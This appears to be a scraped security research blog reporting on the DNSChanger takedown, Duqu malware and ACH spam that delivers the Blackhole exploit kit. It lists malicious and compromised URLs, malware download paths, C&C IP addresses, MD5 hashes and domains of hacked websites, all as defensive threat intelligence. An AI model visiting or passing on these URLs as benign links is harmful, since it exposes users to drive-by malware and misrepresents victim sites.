ygo-foxucobyzy.virtue.nu /mojoqens.html
yiprint.com.tw /
yjoliveba.freewebsitehosting.com /demonidi9.html
ymob-cezulu.freewaywebhost.com /quak0610.html
ymoz-afydybime.mindnmagick.com /pichugana627.html
yosulag.freehost.artonat.com /oruvyhup.html
yulasuhu.adsfree.ru /xubijema.html
yusaduy.123bemyhost.com /uhezivo.html
yxydyt-caxa.mindnmagick.com /oxueywro.html
yzic-kuligu.lookseekpages.com /oupslyng.html
yzid-ufehupuse.servetown.com /mlitvyaj.html
zawizifani366.freewaywebhost.com /qumusegu.html
zebuana.de /
zeh-patinuli.lookseekpages.com /nicsfev.html
zespol-millenium.home.pl /
zil-vakahidyti.lookseekpages.com /umnyk.html
zoom.nsjet.com /~pochince/28nz9l/index.html
zulu-ezaxodevic.freewebsitehosting.com /dimenhofigan.html
zymuzymugo271.s-enterprize.com /bcretkon.html
zyvu-umodecy.1accesshost.com /rvm.html
zyxukifuzo.1accesshost.com /dmimkac.html



====================
List of Financial Institutions used by the "zfin" spam . . .

1st Bank Yuma
1st Capital Bank
1st Centennial Bank
1st Enterprise Bank
1st National Bank of Scotia
1st Pacific Bank of California
1st Source Bank
Abacus Federal SAvings Bank
ABC International Bank
ABN AMRO Bank
Abrams Centre National Bank
Affinity Bank
Agriland FCS
AgTexas
Aig Federal SAvings Bank
Alamerica Bank
Aliant Bank
Allegiance Community Bank
Alliance Bank
Alliance Bank of Arizona
Allied Irish Bank
Alta Alliance Bank
Amalgamated Bank of Chicago
Amarillo National Bank
Amcore Bank
Amegy Bank of Texas
Ameriana Bank and Trust
America California Bank
American Bank
American Bank of Commerce
American Bank of Texas
American Business Bank
American Express Bank Limited
American National Bank
American National Bank of Texas
American River Bank
American Riviera Bank
American Savings Bank
American State ABnk
American State Bank
Americas United Bank
Amsouth Bank
Amsterdam Savings Bank
ANZ Bank
Applied Card Systems
Archer Bank
Artisans Bank
Atlantic Bank of New York
Atlantic Pacific Bank
Atlas Savings Bank
AuburnBank
Austin Bank
Austin County State Bank
Austin Telco Federal Creit Union
Balboa Thrift and Loan Association
Balcones Bank
Ballston Spa National Bank
Bank Atlantic
Bank Calumet
Bank Independent
Bank of Agriculture and Commerce
Bank of Akron
Bank of Amador
Bank of Baroda
Bank of Castile
Bank of Evergreen
Bank Of Illinois
Bank of India
Bank of Los Altos
Bank of Marin
Bank of Marion
Bank of New York
Bank of Orange County
Bank of Pensacola
Bank of Petaluma
Bank of Pine Hill
Bank of Prattville
Bank of Quincy
Bank of Rantoul
Bank of Rio Vista
Bank of Sacramento
Bank of Santa Barbara
Bank of Santa Clarita
Bank of Springfield
Bank of Stockton
Bank of Tampa
Bank of the Orient
Bank of the Sierra
Bank of the Southwest
Bank of the West
Bank of Tidewater
Bank of Tuscaloosa
Bank of Vernon
Bank of Walnut Creek
Bank of Waukegan
Bank One
Bank United
BankChampaign
Bankers Trust Company
BankFIRST
BankUnited Express
Barclays Bank
Barrington Bank and Trust
Bay Area Bank
Bay Cities National Bank
Bay Commercial Bank
Beal Bank
Belvidere Bank
Benchmark Bank
Beverly Bank
Bluestem National Bank
Borel Bank
Borrego Springs Bank
Brady National Bank
Brenham National Bank
Brickyard Bank
Bridgehampton National Bank
Broadway Bank
Broadway Federal Bank
Broadway Federal Bank FSB
Broadway National Bank
Brooklyn Federal Savings Bank
Brown Brothers Harriman
Busey Bank
Business Bank of California
Business First National Bank
Butte Community Bank
Caledonian Fund Services
California Bank and Trust
California Community Bank
California Federal Bank
California National Bank
California Oaks State Bank
California State Bank
Canadaigua National Bank and Trust Company
Canyon Community Bank
Canyon National Bank
Capital City Bank
Capital Farm Credit
Cardinal Services Corp
Carlinville National Bank
Carver Federal SAvings Bank
Cathay Bank
Cattaraugus County Bank
Centier Bank
Central California Bank
Central Illinois Bank
Central National Bank of Waco
Central Trust and Savings Bank
Central Valley Community Bank
Century Bank
CFS Bank
Champlain National Bank
Chang Hwa Commercial Bank Ltd
Charlotte State Bank
Charter National Bank
Charter Oak Bank
Chase Manhattan Bank
Chicago Community Bank
Chino Commercial Bank NA
Circle Bank
Citibank
Citizens Bank
Citizens Bank Baytown
Citizens Bank of Northern California
Citizens Business Bank
Citizens Community Bank
Citizen's Federal Savings Bank
Citizens First Bank
Citizens National Bank
Citizens National Bank of Macomb
Citizens State Bank
Citrus Bank NA
City Bank Lubbock
City National Bank
City National Bank of Florida
City State Bank of Palacios
CivicBank of Commerce
Clarendon Hills Bank
Claritybank
Clay County Bank
Clear Lake National Bank
Coast Commercial Bank
Coast National Bank
Cohen Financial
Cohoes SAvings Bank
Coldwell Banker Commercial PR
Columbia Bank
Comerica
Commerce Bank of Folsom
Commerce National Bank
Commercial Bank of California
Commercial National Bank
Commerzbank
Commonwealth Business Bank
Commonwealth Trust Company
Community 1st Bank
Community Bank
Community Bank and Trust
Community Bank of Elmhurst
Community Bank of Florida
Community Bank of Naples
Community Bank of San Joaquin
Community Bank of Santa Maria
Community Bank of the Bay
Community Bank Texas
Community Banks of Northern California
Community Business Bank
Community Commerce Bank
Community First Bank of Howard County
Community Savings
Community West Bank
Compass Bank
Coppermark Bank
Cornerstone Community Bank
Coronado First Bank
Corus Bank
County Bank
Credit Suisse First Boston
Cross County Federal Savings Bank
Crown Bank
Crystal Lake Bank
DeAnza National Bank
Delaware National Bank
Delta Bank
Delta National Bank
Delta National Bank And Trust Company
Demotte State Bank
DEPFA BANK
Desert Commercial Bank
Deutsche Asset Management
Deutsche Bank
Devon Bank Online
Downers Grove National Bank
Downey Savings
Eagle Bank
East West Bank
Edens Bank
Edgar County Bank and Trust
Effingham State Bank
EFG Capital International Corp
Eisenhower National Bank
El Dorado Savings Bank
El Paseo Bank
Eldorado Bank
Elgin Financial Savings Bank
Elmira Savings Bank FSB
Emerald Coast Bank
Englewood Bank
Esse Hypothekenbank
Eureka Bank
Eurohypo Aktiengesellschaft
European American Bank
Evans National Bank
Evertrust Bank
Excel National Bank
Exchange Bank
Fairport Saving Bank
Falcon International Bank
Far East National Bank
Farm Credit Bank of Texas
Farmers and Merchants Bank
Farmers National Bank
Farmers State Bank of Hoffman
Federal Home Loan Bank
Federal Home Loan Bank of Dallas
Federal Land Bank
Federal Reserve Bank of Chicago
Federal Reserve Bank of Dallas
Federal Reserve Bank of New York
Federal Reserve Bank of San Francisco
Federal Trust Bank
Fidelity Federal Bank
Fidelity Federal Savings Bank
Fifth Third Bank
Fireside Bank
First American Bank
First Bank
First Bank and Trust
First Bank and Trust Company
First Bank of Clewiston
First Bank of San Luis Obispo
First California Bank
First Chicago Capital
First Choice Bank
First Citrus Bank
First City Bank
First Commerce Bank
First Commercial Bank
First Commercial Bank of Florida
First Community Bank
First Convenience Bank
First Federal Bank
First Franklin Bank
First General Bank
First Gulf Bank
First Home Bank
First Indiana Bank
First Internet Bank of Indiana
First Mercantile Bank
First Metro Bank
First Mountain Bank
First National Bank
First National Bank and Trust
First National Bank of Abilene
First National Bank of Ashford
First National Bank of Bellville
First National Bank of Brookfield
First National Bank of Central California
First National Bank of Chillicothe
First National Bank of Danville
First National Bank of Dryden
First National Bank of Eagle Lake
First National Bank of Jasper
First National Bank of Marengo
First National Bank of Mineola Texas
First National Bank of North County
First National Bank of Northern California
First National Bank of Northern New York
First National Bank of Paris
First National Bank of San Benito
First National Bank of Scottsboro
First National Bank of Steeleville
First National Bank of Trenton
First National Bank of Valparaiso
First National Bank of Waterloo
First Navy Bank
First Niagara Bank
First Northern Bank
First of America
First Priority Bank
First Regional Bank
First Savings Bank FSB
First SAvings Bank of Hegewisch
First Southern National Bank
First Standard Bank
First State Bank
First State Bank Frankston
First State Bank of Eldorado
First State Bank of Shallowater
First State Bank of the Florida Keys
First State Bank of Western Illinois
First United Bank
First USA Bank
First Victoria National Bank
FirstBank of Palm Desert
Five Star Bank
Flatbush Federal Savings
FLBA of Texas
Florida Choice Bank
Florida First Bank
Folsom Lake Bank
Foothill Independent Bank
Fort Hood National Bank
Founders Bank
Founders Community Bank
Franklin Bank
Fremont Bank
Frontier Bank
Frost Bank
Frost National Bank
Fullerton Community Bank
Gateway National Bank
Geddes Federal Savings
General Bank
Genesee Regional Bank
Gerard Klauer Mattison
Gibraltar Bank
Global Resource Bank
Golden Security Bank
Goleta National Bank
Grabill Bank
Grand Bank of Florida
Grand National Bank
Grapeland State Bank
Guaranty Bank
Guaranty Bond Bank
Guaranty Federal Bank
Gulf State Community Bank
Habib American Bank
Hanmi Bank
Hardware State Bank
Harris Trust and savings Bank
Hendricks County Bank and Trust
Heritage Bank East Bay
Heritage Bank of Central Illinois
Heritage Bank of Commerce
Heritage Bank South Valley
Heritage Commerce Corp
Heritage Land Bank
Heritage National Bank
Hickory Point Bank and Trust
Highwood Bank
Hinsdale Bank and Trust
Hinsdale Bank Trust Co
Home National Bank
Honda Bank
Horizon Bank
HSBC Bank
Hudson Valley Bank
Humboldt Bank Merchant Services
Hypo Real Estate Bank International
Illini State Bank
Imperial Bank
Imperial Capital LLC
Independent National Bank
Independent Online
ING Capital LLC
Intercredit Bank
International Bancshares
Interstate Bank of Oak Forest
Invex Grupo Financiero
Irwin Financial Corporation
Israel Discount Bank of New York
Itasca Bank and Trust Co
Jackson County Bank
Jacksonville Savings Bank
Jefferson Heritage Bank
Jefferson State Bank
Jourdanton State Bank
JP Morgan Chase Bank
Key West Bank
Kookmin Bank
Lafayette Bank And Trust
Lafayette Savings Bank
Lake Forest Bank and Trust
Lake Shore SAvings And Loan
Lamar National Bank
Landmark Bank
LaSalle State Bank
Lavine Financial Capital
Legacy Bank of Texas
Lehman Brothers
Liberty Bank
Liberty Federal Bank
Liberty Federal Savings Bank
Libertyville Bank
LIFE Bank
Lone Star Federal Land Bank Association
Long Island Commercial Bank
Long Island Savings Bank
Los Angeles National Bank
Lubbock National Bank
Luther Burbank Savings
Madison Bank
Malaga Bank
Mansfield Bank
Manufacturers Bank
Marathon National Bank
Marina Bank
Marketplace Bank
Mazon State Bank
Mellon 1st Business Bank
Melon Bank by
Mercantile Bank
Mercantile Trust and Savings Bank
Merchants and Southern Bank
Merchants Bank of California
Merchants Bank of Jackson
Merchants National Bank of Aurora
Meridian Bank
Merrill Lynch
MetroBank
Metropolitan Bank
MFB Financial
Mission Community Bank
Mission Oaks National Bank
Modern Bank
Mohave Community
Mohave State Bank
Monroe County Bank
Montecito Bank and Trust
Moody National Bank
Morgan Stanley
Morton Community Bank
Murphy Wall State Bank
Mutual Federal Savings Bank
Mutual of Omaha Bank
Nara Bank National Association
NatBank
National Bank
National Bank of California
National City Bank
New Century Bank
New South Federal Savings Bank
Nexity Bank
North Coast Bank
North Community Bank
North County Bank
North County Savings Bank
North Houston Bank
North Valley Bank
Northern Trust Bank
Northern Trust Company
Northfield Savings Bank
NorthShore Trust Saving
NorthStar Bank
Oak Brook Bank
Oak Lawn Bank
Oak Valley Community Bank
Oceanic Bank
Oceanmark Bank
Oceanside Bank of Jacksonville
Old Florida Bank
Old National Bank
Old Second Bancorp
Old Second Bank of Aurora
OptimumBank
Ossian State Bank
Oswego Community Bank
our bank
Overton Bank and Trust
Owen County State Bank
Pacesetter Bank
Pacific Crest Bank
Pacific National Bank
Pacific Trust Bank
Palm Desert National Bank
Palmer Bank
Park Avenue Capital
Park National Bank
Partners Bank
PathFinder Bank
Peoples Bank of Graceville
Peoples Bank of Lubbock
Peoples Bank of North Alabama
Peoples National Bank
People's Trust Company
Permanent Federal Savings Bank
Perryton National Bank
Pff Bank Trust
Phillipine National Bank
Pilgrim Bank
Pinnacle Bank
Pioneer Savings Bank
Plains National Bank Financial
Plaza Bank
Plumas Bank
Pna Bank
Pointe Bank
Ponce de Leon Federal Savings Bank
Popular Bank of Florida
Power Project Financing
Premier Valley Bank
Prosperity Bank
Provident Bank
Queens County Savings Bank
Raiffeisen Zentralbank AG
Randolf County Bank
Redding Bank of Commerce
Regents Bank
Reliance Bank
Ridgewood Bank
Ripley County Bank
River City Bank
Riverside National Bank
Robertson Stephens
Rondout Savings Bank
Roseville Banking Center
Roslyn Savings Bank
Royal Oaks Bank
RZB Finance LLC
Salin Bank and Trust Company
San Diego National Bank
San Jose National Bank
Sand Ridge Bank
Santa Barbara Bank and Trust
Santa Monica Bank
Saratoga National Bank
Scott State Bank
Seacoast National Bank
Second Federal Savings
Security Federal Savings Bank
Seneca Federal Savings and Loan
Sierra Vista Bank
Silicon Valley Bank
Silverado Bank
Six Rivers National Bank
Sonoma Valley Bank
South Alabama Bank
South County Bank
South Pointe Bank
Southern California Funding
Southern Security Bank
Southwest Bank
Southwest Bank of Texas
Sovereign Bank
Spencer County Bank
Star Bank
Star Bank of Texas
Star Financial Bank
State Bank of Ashland
State Bank of Countryside
State Bank of India
State Bank of Lizton
State Bank of Long Island
State Bank of Texas
State Bank of The Lakes
State Bank of Waterloo
State Farm
State National Bank of West Texas
Staten Island Savings Bank
Sterling Bank
Sterling National Bank
Stone City Bank
Strategic Partners
Success National Bank
Suffolk County National Bank
Sumitomo Bank of California
Summit Bank
Surety Bank
Synergy Bank
Tallahassee State Bank
TCB Bank
TCF National Bank
Tempo Bank
Terre Haute Savings Bank
Texas Bank
Texas Capital Bank
Texas Champion Bank
Texas First Banks
Texas Independent Bank
Texas Land Bank
Texas State Bank
The Astoria Federal Savings Bank
The Bank
The Bank and Trust
The Carson Medlin Company
The Dime Savings Bank of New York
The First American Investment Banking Corporation
The First National Bank of Hico
The First National Bank of Long Island
The First State Bank of North Dakota
The Foothills Bank
The Gifford State Bank
The Independent Bankers Bank
The Laredo National Bank
The Mechanics Bank
The SAvings Bank of Utica
The South Holland Bank
The State National Bank
The Warwick Savings Bank
TIB Bank of the Keys
Tokai Bank of California
Tompkins County Trust Company
Town North Bank
Tremont SAvings Bank
Troy Bank and Trust
Troy Savings Bank
Trustbank
Ulster Savings Bank
Unicredito Italiano
Union Bank of Arizona
Union Bank of California
Union Federal
Union Federal Savings Bank
Union Planters Bank
Union State Bank
United Bank
United California Bank
United Commercial Bank
United Community Bank
United Fidelity Bank
United Security Bank
United Southern Bank
Universal Bank
Upstate Niagara Cooperative
us
Valley Business Bank
Valley Commerce Bank
Valley Independent Bank
Valrico State Bank
Vantage Bank of Alabama
Ventura County Business Bank
Viewpoint Bank
Village Banc of Naples
Vineyard Bank
Vintage Bank
VirtualBank
Visalia Community Bank
Vista Bank
Walden Savings Bank
Warrington Bank
Washington Federal Bank
Washington Savings and Loan
Wells Fargo Bank
West Coast Bank
West Suburban Bank
Western Financial Bank
Western Security Bank
Western Springs Bank
Western Springs National Bank
Whisperwood National Bank
Wilber National Bank
Wilmington Trust
Wilshire State Bank
Wintrust Financial Corporation
Woodforest National Bank
Worth National Bank
WSFS bank
Yolo Community Bank

==========================

{ Comments on this entry are closed }

Operation Ghost Click: DNSChanger Malware Ring Dismantled

by UAB's Director of Research in Computer Forensics on November 9, 2011

in SBN

Since 2007 computers around the internet have been suffering from a secret ailment. Sometimes when their owners clicked on a link, they didn't go where they were supposed to go! The problem was caused by a fairly simple piece of malware called a DNSChanger. This family of malware only does one thing -- it changes the DNS settings on your computer from the one that you are supposed to use, to one that a cyber criminal has chosen for you to use.

Today the FBI and NASA's Office of the Inspector General (NASA-OIG) announced "Operation: Ghost Click" and the arrests of six Estonian criminals who have been involved in this scam since 2007.

Those arrested were:

Vladimir Tsastsin
Andrey Taame
Timur Gerassimenko
Dmitri Jegorov
Valeri Aleksejev
Konstantin Poltev
Anton Ivanov

We were especially pleased by the sidebar entitled "Success Through Partnerships".

A complex international investigation such as Operation Ghost Click could only have been successful through the strong working relationships between law enforcement, private industry, and our international partners.

Announcing today’s arrests, Preet Bharara, (above left) U.S. Attorney for the Southern District of New York, praised the investigative work of the FBI, NASA’s Office of Inspector General (OIG), the Estonian Police and Border Guard Board, and he specially thanked the National High Tech Crime Unit of the Dutch National Police Agency. In addition, the FBI and NASA-OIG received assistance from multiple domestic and international private sector partners, including Georgia Tech University, Internet Systems Consortium, Mandiant, National Cyber-Forensics and Training Alliance, Neustar, Spamhaus, Team Cymru, Trend Micro, University of Alabama at Birmingham, and members of an ad hoc group of subject matter experts known as the DNS Changer Working Group (DCWG).


The Manhattan U.S. Attorney's office released a much more detailed announcement with the headline Manhattan U.S. Attorney Charges Seven Individuals for Engineering Sophisticated Internet Fraud Scheme That Infected Millions of Computers Worldwide and Manipulated Internet Advertising Business:
Malware Secretly Re-Routed More Than 4 Million Computers, Generating at Least $14 Million in Fraudulent Advertising Fees for the Defendants.

Congratulations to all who were involved! Especially to the FBI's Botnet Threat Focus Cell, NASA's incredible Office of the Inspector General, the FBI's Southern District of New York office, and those who attended Bar-Con in 2009.

What is DNS? DNS, or Domain Name Services, is what tells your computer how to find the website you are looking for by turning the name you type, such as www.fbi.gov, into an IP address, such as 205.128.73.105. For most users, this happens by asking the Name Server at your Internet Service Provider.

Pay Per Click Fraud



If you were infected by this DNSChanger malware, instead of asking your ISP for that information, you would be asking a criminal. MOST of the time the criminals would simply give you the same answer that your ISP would give you ... but whenever they wanted to make some extra money, they could tell your computer the wrong answer!

In an example taken from the indictment, an infected user goes to Google and types in "itunes". The first link that they are returned shows the destination "www.apple.com/itunes/" which the real Apple website where someone can download the iTunes software.


(source: Tsastsin Indictment)

When an infected computer clicks the link, the user's computer would go to the criminal's nameserver who would send them to the wrong computer. In this case, instead of going to "apple.com" the user is sent to "www.idownload-store-music.com" which looks just like the Apple store, but which charges your credit card to sell you iTunes! The criminals received a payment each time they sent someone to this fake websites.

In other examples, the company where the traffic is sent to is a legitimate company. For example, H&R Block, the Tax preparation people, have an affiliate program. If you have a website, you can put an ad on your website that advertises the H&R Block website. If people click on your ad, you might receive a tiny amount of money, and if they buy something at the H&R website, you might receive a larger amount of money. Instead of advertising, the criminals made a link that redirected you to the H&R Block website if you tried to visit www.irs.gov. So, because you were using the criminal's nameserver, if you typed or clicked on "irs.gov" you could be redirected to H&R Block, earning an "affiliate payment" for the criminals!

Ad Replacement


The other way the criminal earned money was to replace your ads with their ads. How does that earn money? The most common way is that when your computer is told to go get an advertisement from a certain website, such as Google or Bing or Yahoo, instead of showing you the advertisement from those organizations, it would show you an ad from an organization that was run by the criminal instead.

In an example for the court documents, a visitor to ESPN's webpage should have seen an advertisement for Dr. Pepper. But when the infected computer visited the webpage, the criminal's nameserver redirected the request to an advertisement for a timeshare instead!

More than 4 million computers in 100 countries, including 500,000 computers in the United States were infected with this malware. The earnings generated by these young men from the false advertisements exceeded $14 Million Dollars!

Blocking Fake AV


In addition to using the nameserver to send false advertisements, the criminals also used the nameserver to stop infected computers from being able to reach their anti-virus vendors. This prevented the user from being able to install new anti-virus products or to update the definitions on their existing anti-virus products. If the computer attempted to visit any major anti-virus, it would simply give an error saying the server was unavailable.

The Charges


All the criminals are charged with:
1. Wire fraud conspiracy
2. Computer intrusion conspiracy
3. Wire fraud
4. Computer intrusion (furthering fraud)
5. Computer intrusion

In addition, the ringleader, Vladimir Tsastsin was charged with:
6. Money laundering
7. Engaging in monetary transactions of value over $10,000 involving fraud proceeds.

So, Are you infected?



The Protective Order associated with this case lists the IP addresses involved in the fake nameserver business.

85.255.112.0 through 85.255.127.255
67.210.0.0 through 67.210.15.255
93.188.160.0 through 93.188.167.255
77.67.83.0 through 77.67.83.255
213.109.64.0 through 213.109.79.255
64.28.176.0 through 64.28.191.255

The FBI has provided a helpful document that explains how to check your DNS settings to see whether you are using one of these "Rogue DNS Servers". See DNSChanger Malware.

If your IP address is on the list, you are encouraged to fill out the form Register as a Victim of DNS Malware.

The criminals used many different data centers, some of which were featured more prominently in the case than others.

Pilosoft, in New York City known as "The Manhattan Data Center" in the court documents.

ColoSecure, in Chicago, Illinois

ThePlanet, in Houston, Texas

Multacom Corporation, in Canyon County, California

Layered Technologies, in Plano, Texas

Network Operation Center, in Scranton, Pennsylvania

Wholesale Internet, in Kansas City, Missouri

SingleHop, in Chicago, Illinois

PremiaNet, in Las Vegas, Nevada

Interserver, in Secaucus, New Jersey

ISPrime, in Weehawken, New Jersey

Global Net Access, in Atlanta, Georgia

The Challenge



The big challenge faced by this case was this -- if the FBI were to simply "turn off" all of these nameservers, four million computers would no longer be able to find anything on the Internet! If your computer has been programmed by the DNSChanger malware to look up names using the criminals' nameserver, and that nameserver goes away, there is no "fall back" to use some other nameserver, your computer just stops being able to look up names! If that had happened, when you typed in "www.facebook.com" your computer would say something like "No Such Server" or "Host Unknown". Then you couldn't play Farmville! How sad!

To address this challenge, the FBI filed a Protective Order that identified all of the Rogue DNS Servers, and assigned the IP addresses belonging to those servers to the Internet Systems Consortium, or ISC. ISC established "replacement DNS servers" that would behave properly, and replaced all of the "Rogue DNS servers" with properly configured DNS servers. After this was accomplished, none of the infected computers would be redirected to the wrong content anymore, and they would once again be able to update their anti-virus software.

The other benefit of this action is that ISC is now in a position to be able to compile a list of the computers that have been infected. Each time a computer uses one of the formerly Rogue DNS servers, ISC will log that action so that we can have accurate knowledge of how many computers have been infected, and this class of victims can be offered assistance.

The Protective Order was approved by the Honorable William H. Pauly III on November 3rd in the Southern District of New York.

The Criminal Companies


The Estonian criminals controlled a number of corporations to enable this activity.

Rove Digital, in Estonia, was a software development company that created and managed the malware.

Tamme Arendus, also in Estonia, was a real estate development business that acquired most of Rove's assets.

SPB Group was the name of the company that leased the Manhattan Data Center from Pilosoft.

Cernel Inc, in California, Internet Path Limited, in New York, Promnet Limited, in Ukraine, ProLite Limited, in Russia, Front Communications, in New York, and others were involved with registering thousands of IP addresses that were used by the criminals for various activities.

Furox Aps (Gathi.com), Onwa Limited (Uttersearch.com), Lintor Limited (Crossnets.com) and others were used to create and broker advertising deals which would be used in the Replacement Ad schemese.

{ Comments on this entry are closed }

Duqu: You’re safe unless you use TrueType Fonts?

by UAB's Director of Research in Computer Forensics on November 4, 2011

in SBN

Two of the malware analysts in my lab have been complaining to me that the malware they see everyday is getting boring - the primary attacks that we see in the largest volume are the same thing over and over and over again.

Let's be thankful for that! The big news in the malware world yesterday came when Microsoft announced a work around for Duqu, named by researchers in the CrySyS Lab (the Laboratory for Cryptography and System Security at Budapest University of Technology and Economics) because it prefixes some created filenames with the letters "~DQ".

On October 14, 2011, CrySyS contacted Symantec to get some help analyzing the malware, and Symantec released an extremely informative 67 page PDF report called W32.Duqu: The Precursor to the next Stuxnet. (The link is to version 1.3 of the report, updated on November 1, 2011).

There have been two IP addresses confirmed to be associated with Duqu and serving as Command & Control. The first IP was in India - 206.183.111.97. The second was in Hungary - 77.241.93.160. Traffic flow to either of these IP addresses would be a strong positive indicator of a Duqu infection! Both sites are down now.

The first server was announced to be down on October 31st in stories such as this one -- India Shuts Server Linked to Duqu Computer Virus that shares some details of a server located at 200 employee data center Web Werks.

The second server was at Combell in Belgium -- as described in stories such as this one -- Duqu Hackers Shift to Belgium After India Raid.

Duqu is a data stealing program that shares several blocks of code with Stuxnet. In fact, one of the two pieces of malware we've seen that is described as being Duqu is also detected as Stuxnet by some AV vendors.

Here's a VirusTotal report of the better detected of those pieces of code, which had the MD5 value e1e00c2d5815e4129d8ac503f6fac095. This file is not "Duqu" but is rather "an .exe file related to Duqu" which is a much larger program (this one is only 9k in size).

(Click for VirusTotal Report)

Non "generic" definitions for this malware included:

Avast: Win32:Duqu-F
Emsisoft: Trojan.Win32.Stuxnet!IK
Ikarus: Trojan.Win32.Stuxnet
Microsoft: Trojan:Win32/Duqu.E
NOD32: probably a variant of Win32/Duqu.A
TrendMicro: TROJ_DUQU.AJ


Symantec mentioned MD5s



9749d38ae9b9ddd81b50aad679ee87ec
Wed Jun 01, 03:25:18 2011
Stealing information

4c804ef67168e90da2c3da58b60c3d16
Mon Oct 17 17:07:47 2011
Reconnaissance module

856a13fcae0407d83499fc9c3dd791ba
Mon Oct 17 16:26:09 2011
Lifespan extender

92aa68425401ffedcfba4235584ad487
Tue Aug 09 21:37:39 2011
Stealing information

In each of those above, the link on the MD5 will show you the VirusTotal report. I find it interesting that TrendMicro consistently names these files "TROJ_SHADOW.AG" which makes me wonder if they had independently discovered this malware family prior to the naming as Duqu by the CrySyS team.

Symantec calls attention to the fact that several of these files show compile dates AFTER the public disclosure of the existence of Duqu.

Delivery Mechanism


Symantec disclosed in their report that one of the infections they were analyzing had been infected via a Word Document that exploited the system using a previously unknown 0-day attack.

We now know from Microsoft more about this exploit. On November 3, 2011, Microsoft released this Microsoft Security Advisory (2639658)
Vulnerability in TrueType Font Parsing Could Allow Elevation of Privilege. The advisory starts with an executive summary which says, in part:

Microsoft is investigating a vulnerability in a Microsoft Windows component, the Win32k TrueType font parsing engine. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. The attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. We are aware of targeted attacks that try to use the reported vulnerability; overall, we see low customer impact at this time. This vulnerability is related to the Duqu malware.


Microsoft has released a work around. The exploit is taking advantage of the fact that there is a problem in one of the DLL's called by TrueType in certain circumstances. If a system denies access to that .DLL, T2EMBED.DLL, then the exploit would fail to work.

The workaround can be executed like this, but Microsoft cautions that applications that rely on EMBEDDED TrueType fonts could then fail to display properly:

(For older Windows versions)
Echo y| cacls "%windir%\system32\t2embed.dll" /E /P everyone:N

(For newer Windows versions)
Takeown.exe /f "%windir%\system32\t2embed.dll"

For more details on the workaround, please see Microsoft Security Advisory: Vulnerability in TrueType font parsing could allow elevation of privileges which offers a "Fix It For Me" button to apply the work around for you.

Duqu Compared to Stuxnet



The Symantec report has 22 or so pages of original Symantec content, and then has as the majority of it's body the report by the CrySyS Lab, which has a section that compares the Duqu and Stuxnet code. In particular, the Decryption function seems to be nearly identical.

{ Comments on this entry are closed }

ACH spam uses intermediary sites to deliver malware punch

by UAB's Director of Research in Computer Forensics on October 19, 2011

in SBN

If you have an email address in the United States, either you or your spam filter is certainly familiar with this spam by now:



The spam with the subjects "ACH Payment (random numbers) Canceled" intends to imitate the National Automated Clearing House Association. NACHA is the organization that banks use to handle the electronic transfer of funds between domestic banks for things such as "Direct Deposit" or electronic bill paying.

The spam's message "The ACH transaction recently initiated from your checking acount was canceled by the other financial institution" is intended to elicit a panic response to get the recipient to click on the link in the email.

The problem has been getting worse because of two "upgrades" by the spammers.

First - they are using "drive-by" infectors, in the form of the BlackHole Exploit Kit. In the past a spam message such as this would have relied on trying to get you to download an '.exe' file and trick you into running it on your computer. Now, simply visiting the website will often be enough to infect your machine.

The second improvement, which comes and goes in waves, is that the criminals have compromised many "intermediary" web hosts to use in their spam. If the spammer were sending you to "mybadsite.com" your security software would quickly learn that "mybadsite.com" is a potentially harmful destination and block you from visiting.

To make sure their spam is delivered, the spammers have stolen the credentials from many website owners and have used these credentials to add one tiny file to their existing legitimate website. So, as a randomly chosen example, the spam link that claims to point to "nacha.org" may actually point to a page at "iscsconferencerecording.com". That page belongs to the International Society of Communication Specialists, so it probably has a "positive" reputation among security companies, who may be loathe to block the site.

What happens when we visit that page?

The only contents on the page "am2wdh.html" are calls to two Javascript files on other websites. In this case:

www.xmjhx.com /czc /js.js
and
vscreative.com /images /js.js


The first time I loaded this, it caused a document location to be set to "www.nachaemployee.com"

A rerun of the same site pointed me instead to a blackhole exploit kit page at:

milloworks.com /main.php? page=890639ab2b6c1ab8

Which caused me to fetch:

milloworks.com /w.php ?f=70&e=4

This caused me to download the file:

www.vncoach.com /editors /nachareport20111910.pdf.exe





Another attempt sent me to:

tgqswpqqh.org.in from which we attempt to load the Blackhole Exploit page from

This drops a number of files on our computer, including Flash exploits, PDF exploits, and an EXE called "FIX_KB112755.exe" which gets downloaded from the IP address 213.123.52.133. FIX_KB111088.exe and FIX_KB113547.exe were also downloaded from there.

After the malware drops on the computer, we are forwarded through "dating-portal.net" where the affiliate engine sends us to an "Adult Friend Finder" sign-up website.

The point of this story, however, is not really what malware gets dropped, but the use of so many hacked intermediary servers to do the dropping.

In the first twelve hours of October 19, 2011, we saw 184 different websites used in this type of attack with an ACH spam subject line. In order of occurrence, with the first observed URL each, here is what we've seen today:

HOSTNAME PATH
================================ ===================================
preseis.com /7x1tyg6.html
server.softhost.org /
silverfruit.com.ec /t2jr.html
newsletter.stable-jo.com /t43z.html
www.Shoubra-prep.com /4x8l.html
marcinjarzabek.cp5.win.pl /16ih2.html
professionalroofing.co.uk /ph4xn5.html
host272.hostmonster.com /~fdflockc/6xh9l1e.html
sethsauction.com /6gh1u7.html
www.corazondejesus.net /4cpjx.html
murciaopina.com /tq3e.html
www.digitalhomna.com /
latinholdings.com.mx /4ghy.html
108cms.com /3n7s.html
way2tutorial.com /g02lwbp.html
nimbuscertifications.com /4qt4.html
ultimateselena.org /0tpno.html
www.efficientorganizationnw.com /rk1pb.html
trinity-work-shop.test-rackspeed.de /
hosting31.serverhs.org /~ecommerc/zu9iah7.html
www.todotaringa.com /0pya.html
stremyfoot.com /q37hdi.html
www.ganarlaprimitiva.com /g5knqjr.html
manaiz.com /a2w7q.html
caspsurveys.org /zmu2.html
www.ironsidegroup.pk /kq6bz.html
temporary-toilets.com /mczkg.html
0342962.netsolhost.com /716txi.html
babilhotel.com /5bf0html
customcakesnw.com /not8.html
tomralph.net /vsz8c.html
www.panelpeople.com /1060.html
goldencrownhotel.com /zf9w3uh.html
www.launas.fr /jjssgx4.html
dev.crm-warehouse.be /uclt4.html
alassite.com /2hyl0.html
02be375.netsolhost.com /6mu1v.html
evo2inc.com /o3wyn.html
campossaab.net /g1hrhtml
inzanepix.com /19v4sx.html
specialrental.com /p5y6.html
iscsconferencerecording.com /am2wdh.html
www.murciaopina.com /rt5dmy.html
buynanoclean.com /3c6tp7.html
froda.com /5kbnak.html
globaliellc.com /1o36z.html
mslbx.com /~servatus/soexlyy.html
indexpoker.com /
diversco.com /6fxo.html
www.acclaimcabinetscom.au /7xoslgn.html
mvlmobile.in /d34c.html
